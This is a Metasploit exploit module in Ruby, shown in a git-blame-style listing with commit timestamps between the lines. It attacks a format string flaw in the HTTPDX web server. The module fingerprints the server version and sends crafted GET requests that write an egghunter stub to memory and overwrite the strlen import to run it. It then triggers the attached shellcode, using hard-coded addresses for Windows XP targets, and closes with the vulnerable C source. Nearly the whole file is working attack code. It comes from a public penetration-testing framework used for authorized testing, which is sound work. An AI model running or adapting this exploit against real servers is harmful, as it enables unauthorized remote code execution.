2010-02-07 21:42:12 +00:00
|
|
|
##
|
|
|
|
# $Id$
|
|
|
|
##
|
|
|
|
|
|
|
|
##
|
|
|
|
# This file is part of the Metasploit Framework and may be subject to
|
|
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
|
|
|
# Framework web site for more information on licensing and terms of use.
|
|
|
|
# http://metasploit.com/framework/
|
|
|
|
##
|
|
|
|
|
2009-11-18 02:29:37 +00:00
|
|
|
require 'msf/core'
|
|
|
|
|
|
|
|
class Metasploit3 < Msf::Exploit::Remote
|
2009-12-06 05:50:37 +00:00
|
|
|
Rank = GreatRanking
|
2010-02-07 21:42:12 +00:00
|
|
|
|
2009-11-18 02:29:37 +00:00
|
|
|
include Msf::Exploit::Remote::Tcp
|
|
|
|
include Msf::Exploit::Egghunter
|
|
|
|
include Msf::Exploit::FormatString
|
2010-02-07 21:42:12 +00:00
|
|
|
|
2009-11-18 02:29:37 +00:00
|
|
|
def initialize(info = {})
|
2010-02-07 21:42:12 +00:00
|
|
|
super(update_info(info,
|
2009-11-18 02:29:37 +00:00
|
|
|
'Name' => 'HTTPDX tolog() Function Format String Vulnerability',
|
|
|
|
'Description' => %q{
|
2010-02-07 21:42:12 +00:00
|
|
|
This module exploits a format string vulnerability in HTTPDX HTTP server.
|
2009-11-19 03:36:02 +00:00
|
|
|
By sending an specially crafted HTTP request containing format specifiers, an
|
2009-11-18 02:29:37 +00:00
|
|
|
attacker can corrupt memory and execute arbitrary code.
|
2010-02-07 21:42:12 +00:00
|
|
|
|
2009-11-18 02:29:37 +00:00
|
|
|
By default logging is off for HTTP, but enabled for the 'moderator' user
|
|
|
|
via FTP.
|
|
|
|
},
|
|
|
|
'Author' =>
|
|
|
|
[
|
2010-03-10 05:58:01 +00:00
|
|
|
'jduck' # original discovery and metasploit module
|
2009-11-18 02:29:37 +00:00
|
|
|
],
|
2010-05-03 17:13:09 +00:00
|
|
|
'Version' => '$Revision$',
|
2009-11-18 02:29:37 +00:00
|
|
|
'References' =>
|
|
|
|
[
|
2009-11-18 04:16:10 +00:00
|
|
|
[ 'OSVDB', '60182' ]
|
2009-11-18 02:29:37 +00:00
|
|
|
],
|
|
|
|
'DefaultOptions' =>
|
|
|
|
{
|
|
|
|
'EXITFUNC' => 'process'
|
|
|
|
},
|
|
|
|
'Privileged' => true,
|
|
|
|
'Payload' =>
|
|
|
|
{
|
|
|
|
# format string max length
|
|
|
|
'Space' => 1024,
|
|
|
|
'BadChars' => "\x00\x0a\x0d\x25\x2f\x3f\x5c",
|
|
|
|
'DisableNops' => 'True',
|
|
|
|
'StackAdjustment' => -1500
|
|
|
|
},
|
|
|
|
'Platform' => 'win',
|
|
|
|
'Targets' =>
|
2010-02-07 21:42:12 +00:00
|
|
|
[
|
|
|
|
#
|
|
|
|
# Automatic targeting via fingerprinting
|
|
|
|
#
|
|
|
|
[ 'Automatic Targeting', { 'auto' => true } ],
|
|
|
|
|
|
|
|
#
|
|
|
|
# specific targets
|
|
|
|
#
|
|
|
|
[ 'httpdx 1.4 - Windows XP SP3 English',
|
|
|
|
{
|
|
|
|
'PadBytes' => 2,
|
|
|
|
'NumPops' => 22,
|
|
|
|
'Writable' => 0x64f87810, # empty space in core.dll imports
|
|
|
|
'FlowHook' => 0x64f870e8 # core.dll import for strlen
|
|
|
|
}
|
|
|
|
],
|
|
|
|
[ 'httpdx 1.4.5 - Windows XP SP3 English',
|
|
|
|
{
|
|
|
|
'PadBytes' => 2,
|
|
|
|
'NumPops' => 22,
|
|
|
|
'Writable' => 0x64f87810, # empty space in core.dll imports
|
|
|
|
'FlowHook' => 0x64f870e8 # core.dll import for strlen
|
|
|
|
}
|
|
|
|
],
|
|
|
|
[ 'httpdx 1.4.6 - Windows XP SP3 English',
|
|
|
|
{
|
|
|
|
'PadBytes' => 2,
|
|
|
|
'NumPops' => 22,
|
|
|
|
'Writable' => 0x64f87810, # empty space in core.dll imports
|
|
|
|
'FlowHook' => 0x64f870e8 # core.dll import for strlen
|
|
|
|
}
|
|
|
|
],
|
|
|
|
[ 'httpdx 1.4.6b - Windows XP SP3 English',
|
|
|
|
{
|
|
|
|
'PadBytes' => 2,
|
|
|
|
'NumPops' => 22,
|
|
|
|
'Writable' => 0x64f87810, # empty space in core.dll imports
|
|
|
|
'FlowHook' => 0x64f870e8 # core.dll import for strlen
|
|
|
|
}
|
|
|
|
],
|
|
|
|
[ 'httpdx 1.5 - Windows XP SP3 English',
|
|
|
|
{
|
|
|
|
'PadBytes' => 2,
|
|
|
|
'NumPops' => 22,
|
|
|
|
'Writable' => 0x64f87810, # empty space in core.dll imports
|
|
|
|
'FlowHook' => 0x64f870e8 # core.dll import for strlen
|
|
|
|
}
|
|
|
|
]
|
2009-11-18 02:29:37 +00:00
|
|
|
],
|
|
|
|
'DefaultTarget' => 0))
|
|
|
|
=begin
|
|
|
|
|
|
|
|
NOTE: Even though all targets have the same addresses now, future targets may not.
|
|
|
|
|
|
|
|
To find a target:
|
|
|
|
|
|
|
|
1. open "core.dll" in IDA Pro
|
|
|
|
2. navigate to the "c_wildcmp" function
|
|
|
|
3. follow the xref to the first strlen
|
|
|
|
4. follow the xref to the imports area
|
2010-02-07 21:42:12 +00:00
|
|
|
5. copy/paste the address
|
2009-11-18 02:29:37 +00:00
|
|
|
6. the 'Writable' value should be anything after the last address IDA shows..
|
2009-11-19 03:36:02 +00:00
|
|
|
(preferably something above 0x0d, to avoid bad chars)
|
2009-11-18 02:29:37 +00:00
|
|
|
|
|
|
|
If crashes occur referencing strange values, 'NumPops' probably needs adjusting.
|
|
|
|
For now, that will have to be done manually.
|
|
|
|
|
|
|
|
=end
|
2010-02-07 21:42:12 +00:00
|
|
|
register_options(
|
|
|
|
[
|
|
|
|
Opt::RPORT(80),
|
|
|
|
], self.class )
|
2009-11-18 02:29:37 +00:00
|
|
|
end
|
2010-02-07 21:42:12 +00:00
|
|
|
|
|
|
|
|
2009-11-18 02:29:37 +00:00
|
|
|
def check
|
2010-02-07 21:42:12 +00:00
|
|
|
|
2009-11-18 02:29:37 +00:00
|
|
|
version = get_version
|
|
|
|
if version
|
|
|
|
print_status("HTTPDX version detected : #{version}")
|
|
|
|
if version =~ /"1\.4"/
|
|
|
|
return Exploit::CheckCode::Appears
|
|
|
|
end
|
|
|
|
end
|
|
|
|
return Exploit::CheckCode::Safe
|
|
|
|
end
|
2010-02-07 21:42:12 +00:00
|
|
|
|
|
|
|
|
2009-11-18 02:29:37 +00:00
|
|
|
def exploit
|
2010-02-07 21:42:12 +00:00
|
|
|
|
2010-04-30 08:40:19 +00:00
|
|
|
# Use a copy of the target
|
2009-11-18 02:29:37 +00:00
|
|
|
mytarget = target
|
2010-02-07 21:42:12 +00:00
|
|
|
|
2009-11-18 02:29:37 +00:00
|
|
|
if (target['auto'])
|
|
|
|
mytarget = nil
|
2010-02-07 21:42:12 +00:00
|
|
|
|
2009-11-18 02:29:37 +00:00
|
|
|
print_status("Automatically detecting the target...")
|
2010-02-07 21:42:12 +00:00
|
|
|
|
2009-11-18 02:29:37 +00:00
|
|
|
version = get_version()
|
|
|
|
if not version
|
|
|
|
print_status("No matching target")
|
|
|
|
return
|
|
|
|
end
|
|
|
|
|
|
|
|
self.targets.each do |t|
|
|
|
|
if (t.name =~ /#{version} - /) then
|
|
|
|
mytarget = t
|
|
|
|
break
|
|
|
|
end
|
|
|
|
end
|
2010-02-07 21:42:12 +00:00
|
|
|
|
2009-11-18 02:29:37 +00:00
|
|
|
if (not mytarget)
|
|
|
|
print_status("No matching target")
|
|
|
|
return
|
|
|
|
end
|
2010-02-07 21:42:12 +00:00
|
|
|
|
2009-11-18 02:29:37 +00:00
|
|
|
print_status("Selected Target: #{mytarget.name}")
|
|
|
|
else
|
|
|
|
print_status("Trying target #{mytarget.name}...")
|
|
|
|
end
|
|
|
|
|
|
|
|
# proceed with chosen target...
|
2010-02-07 21:42:12 +00:00
|
|
|
|
2009-11-18 02:29:37 +00:00
|
|
|
# '<ip> [Tue, 17 Nov 2009 18:22:12 GMT] "<GET/POST> /'
|
|
|
|
ip_length = Rex::Socket.source_address(datastore['RHOST']).length
|
|
|
|
num_start = ip_length + 2 + 29 + 3 + 3 + 2
|
2010-02-07 21:42:12 +00:00
|
|
|
|
2009-11-18 02:29:37 +00:00
|
|
|
# use the egghunter!
|
|
|
|
eh_stub, eh_egg = generate_egghunter
|
|
|
|
|
2010-02-07 21:42:12 +00:00
|
|
|
|
2009-11-18 02:29:37 +00:00
|
|
|
# write shellcode to 'writable' (all at once)
|
|
|
|
fmtbuf = generate_fmtstr_from_buf(num_start, mytarget['Writable'], eh_stub, mytarget)
|
|
|
|
fmtbuf = fmtbuf.gsub(/%/, '%25').gsub(/ /, '%20')
|
|
|
|
print_status(" payload format string buffer is #{fmtbuf.length} bytes")
|
2010-02-07 21:42:12 +00:00
|
|
|
|
2009-11-18 02:29:37 +00:00
|
|
|
connect
|
|
|
|
request = "GET /"
|
|
|
|
request << fmtbuf
|
|
|
|
request << " HTTP/1.0\r\n"
|
|
|
|
request << "Host: \r\n"
|
|
|
|
request << "\r\n"
|
|
|
|
sock.put(request)
|
|
|
|
disconnect
|
2010-02-07 21:42:12 +00:00
|
|
|
|
|
|
|
|
2009-11-18 02:29:37 +00:00
|
|
|
# write 'writable' addr to flowhook (execute shellcode)
|
|
|
|
# NOTE: the resulting two writes must be done at the same time
|
|
|
|
fmtbuf = generate_fmt_two_shorts(num_start, mytarget['FlowHook'], mytarget['Writable'], mytarget)
|
|
|
|
# add payload to the end
|
|
|
|
fmtbuf << eh_egg * 2
|
|
|
|
fmtbuf << payload.encoded
|
|
|
|
fmtbuf = fmtbuf.gsub(/%/, '%25').gsub(/ /, '%20')
|
|
|
|
print_status(" hijacker format string buffer is #{fmtbuf.length} bytes")
|
2010-02-07 21:42:12 +00:00
|
|
|
|
2009-11-18 02:29:37 +00:00
|
|
|
connect
|
|
|
|
request = "GET /"
|
|
|
|
request << fmtbuf
|
|
|
|
request << " HTTP/1.0\r\n"
|
|
|
|
request << "Host: \r\n"
|
|
|
|
request << "\r\n"
|
|
|
|
#print_status("\n" + Rex::Text.to_hex_dump(request))
|
|
|
|
sock.put(request)
|
|
|
|
disconnect
|
|
|
|
|
|
|
|
# connect again to trigger shellcode
|
|
|
|
select(nil, nil, nil, 1.5)
|
|
|
|
print_status(" triggering shellcode now")
|
|
|
|
print_status("Please be patient, the egg hunter may take a while...")
|
|
|
|
connect
|
2010-02-07 21:42:12 +00:00
|
|
|
|
2009-11-18 02:29:37 +00:00
|
|
|
handler
|
|
|
|
end
|
2010-02-07 21:42:12 +00:00
|
|
|
|
|
|
|
|
2009-11-18 02:29:37 +00:00
|
|
|
def get_version
|
2010-02-07 21:42:12 +00:00
|
|
|
|
2009-11-18 02:29:37 +00:00
|
|
|
connect
|
|
|
|
sock.put("GET / HTTP/1.0\r\n\r\n")
|
|
|
|
resp = sock.get_once
|
|
|
|
disconnect
|
2010-02-07 21:42:12 +00:00
|
|
|
|
2009-11-18 02:29:37 +00:00
|
|
|
# this will need to be updated if httpdx is ever fixed :)
|
|
|
|
if (resp and (m = resp.match(/Server: httpdx\/(.*) \(Win32\)/))) then
|
|
|
|
return m[1]
|
|
|
|
end
|
2010-02-07 21:42:12 +00:00
|
|
|
|
2009-11-18 02:29:37 +00:00
|
|
|
return nil
|
|
|
|
end
|
2010-02-07 21:42:12 +00:00
|
|
|
|
2009-11-18 02:29:37 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
|
|
|
|
=begin
|
|
|
|
|
|
|
|
also present in 1.5 (presumably all versions in between)
|
|
|
|
|
|
|
|
1.4/httpdx_src/ftp.cpp:
|
|
|
|
|
|
|
|
544 //printf(out);
|
|
|
|
545 char af[MAX] = {0};
|
|
|
|
546 if(isset(out) && client->serve.log || client->serve.debug)
|
|
|
|
547 snprintf(af,sizeof(af)-1,"%s\n%s%s\n",client->addr,client->cmd,out);
|
|
|
|
548 if(isset(out) && client->serve.log)
|
|
|
|
549 tolog(client->serve.accessl,af);
|
|
|
|
550 if(isset(out) && client->serve.debug)
|
|
|
|
551 printf(af);
|
|
|
|
|
|
|
|
1.4/httpdx_src/http.cpp:
|
|
|
|
|
|
|
|
172 char af[MAX] = {0};
|
|
|
|
173 if(client.serve.log || client.serve.debug)
|
|
|
|
174 snprintf(af,sizeof(af)-1,"%s [%s] \"%s /%s HTTP/1.1\" %d\n",client.addr,timef,m[client.method-1],client.filereq,response.code);
|
|
|
|
175 if(client.serve.log)
|
|
|
|
176 tolog(client.serve.accessl,af);
|
|
|
|
177 if(client.serve.debug)
|
|
|
|
178 printf(af);
|
|
|
|
|
|
|
|
=end
|